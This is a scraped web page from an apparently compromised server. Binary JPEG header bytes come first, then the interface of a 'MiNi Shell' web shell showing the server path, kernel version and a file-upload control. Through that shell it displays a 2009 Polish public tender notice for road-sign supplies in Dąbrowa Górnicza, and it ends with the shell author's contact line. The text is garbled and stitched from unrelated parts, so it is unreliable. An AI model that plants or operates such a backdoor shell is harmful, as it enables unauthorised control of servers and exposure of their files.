JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090908/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090908/310314-N-2009.html

<p class="kh_header"><b>Dąbrowa Górnicza: Dostawa elementów drogowego oznakowania pionowego</b><br>
<b>Numer ogłoszenia: 310314 - 2009; data zamieszczenia: 08.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Ulic i Mostów Spółka z o.o. , Aleja Zagłębia Dąbrowskiego 15, 41-303 Dąbrowa Górnicza, woj. śląskie, tel. 032 2689022, 2612051, faks 032 2689022.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mzum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: os. prawna w zw. z art. 3.1 pkt 3 ustawy Pzp.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elementów drogowego oznakowania pionowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa tablic znaków drogowych, tablic informacyjnych, kierunkowskazów, elementów mocujących tablice, zgodnie z opisem przedmiotu zamówienia i załącznikiem nr 1A do niniejszej umowy (charakterystyka przedmiotu zamówienia -formularz cenowy).
Wszystkie tablice znaków winny być wykonane w technologii obróbki plastycznej metali z blachy ogniowo-ocynkowanej o grubości min. 1,25 mm  z powłoką ocynku 275g/m2  wg PN-EN/10142+A1 lub z blachy aluminiowej o grubości 1,5 mm wg normy PN-EN/4851-4. Krawędzie tarczy usztywnione na całym obwodzie poprzez podwójne gięcie bez nacięć.
Malowane proszkowo. Narożniki tablicy winny być zaokrąglone  o promieniu zgodnym z obowiązującymi normami. 
Tarcze tablic wielosegmentowych  z dwóch i więcej segmentów powinny być  łączone ze sobą wzdłuż podwójnej giętej krawędzi tak, aby powierzchnie łączone wzajemnie się zazębiały, tworząc połączenie zamkowe eliminujące zjawisko klawiszowania. 
Krawędzie tablic typu - E niezależnie od zastosowanej na lico folii odblaskowej mają być zabezpieczone  na całym obwodzie ramą  z profilu ceowego, stalowego, ocynkowanego i pomalowanego. 
Lica wszystkich  tablic wymagane  z folii odblaskowej I gen. lub II gen (w zależności od potrzeby Zamawiającego), odpornej na promieniowanie UV oraz inne warunki atmosferyczne. Dla folii  I gen. gwarancja winna być przez okres minimum -  7 lat,  dla II gen.- gwarancja 10 lat. 
Ponadto wszystkie elementy ujęte w załączniku nr 1 A muszą  posiadać atesty wydane przez Krajowy Certyfikat Zgodności,  certyfikaty jakościowe, a także inne Aprobaty Techniczne przewidziane prawem w tym na stałe odblaskowe znaki drogowe.
Znaki i tablice drogowe (drogowskazy strzałowe) w technologii podwójnie gięta krawędź na całym obwodzie bez wycięć, nacięć i przewężeń na narożach. 
Drogowskazy strzałowe z wyokrąglonymi narożami oraz grotem.
Mocowanie tarcz znaków i tablic do konstrukcji wsporczych przy pomocy uchwytów zaciskowych do zagiętej krawędzi tarczy.
Realizacja zamówienia odbywać się będzie w partiach i ilościach określonych cyklicznymi zamówieniami składanymi przez Zamawiającego, według faktycznych potrzeb w czasie nie dłuższym niż:
- dostawa w trybie normalnym do 7 dni;
- dostawa w trybie przyspieszonym do 3 dni.
Wykonawca przyjmuje do wiadomości, iż Zamawiający zastrzega sobie prawo niewykorzystania szacunkowych ilości asortymentu określonego w załączniku nr 1A do SIWZ, i nie będzie żądał z tego tytułu od Zamawiającego wynagrodzenia i żadnych roszczeń.
Zamawiający zgodnie z art. 144 ust. 1 ustawy Pzp zastrzega sobie prawo zmiany postanowień zawartej umowy w następujących przypadkach:
- w przypadku, kiedy zmiana nie będzie dotyczyć istotnych postanowień umowy - bez ograniczeń,
- w pozostałych przypadkach tylko i wyłącznie z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy lub są one korzystne dla Zamawiającego.
Szczegółowy opis przedmiotu zamówienia (rodzaje i ilości) zawiera załącznik nr 1 A do SIWZ.
Wszystkie elementy dostarczane zamawiającemu winny posiadać znak firmowy identyfikujący Dostawcę oraz datę produkcji.
 W przypadku nie zrealizowania zamówienia w całej wysokości 
w zakresie podanym w załączniku nr 1A- Charakterystyka przedmiotu zamówienia (formularz  cenowy) Wykonawca nie ma prawa do żadnych roszczeń z tego tytułu wobec Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 44.42.34.00-5, 34.99.22.00-9, 34.99.23.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawcy ubiegający się o zmówienie publiczne muszą spełniać niżej wymienione warunki udziału w postępowaniu: 
1.	Spełniać wymagania określone w art. 22 ust. 1  ustawy Pzp;
2.	Nie podlegać wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 ustawy Pzp; 
3.	Posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia, (art. 22 ust. 1 pkt 2 ustawy Pzp);
4.	Wykazać w okresie ostatnich 3 lat lub w okresie działalności jeżeli była krótsza niż 3 lata, że zrealizowali min. 3 zadania odpowiadające swoim rodzajem i wartością dostawom  stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączyć dokumenty potwierdzające, że dostawy te, których łączna wartość nie powinna być mniejsza niż 500.000,00 zł brutto/rok,  zostały wykonane należycie. 
5.	Nie zalegać z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub przedstawić zaświadczenie, że uzyskali przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

 
Zamawiający dokona oceny spełniania przez Wykonawców ww. warunków według reguły spełnia/niespełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. V. SIWZ. Z treści załączonych dokumentów musi jednoznacznie wynikać, iż warunki udziału w postępowaniu Wykonawca spełnił. Niespełnienie chociażby jednego z warunków udziału w postępowaniu, skutkować będzie wykluczeniem Wykonawcy. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3. Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5. 	Oświadczenie Wykonawcy, że spełnia warunki wskazane w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych; (załącznik nr 2 do SIWZ).
6.	Minimum 3 dokumenty (np. referencje ) celem potwierdzenia, że dostawy odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia zostały wykonane należycie. Łączna wartość wykonanych/wykonywanych dostaw nie powinna być mniejsza niż 500.000,00  zł. brutto/rok.
7.	Wykaz wykonanych/wykonywanych dostaw w związku z pkt IV.4 SIWZ, (załącznik nr 3 do SIWZ).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.mzum.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.mzum.pl
Miejski Zarząd Ulic i Mostów
Spółka z o.o.
Ul. Aleja Zagłębia Dąbrowskiego 15
41-303 Dąbrowa Górnicza.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2009 godzina 10:00, miejsce: Miejski Zarząd Ulic i Mostów
Spółka z o.o.
Ul. Aleja Zagłębia Dąbrowskiego 15
41-303 Dąbrowa Górnicza
pok. nr 1 -sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com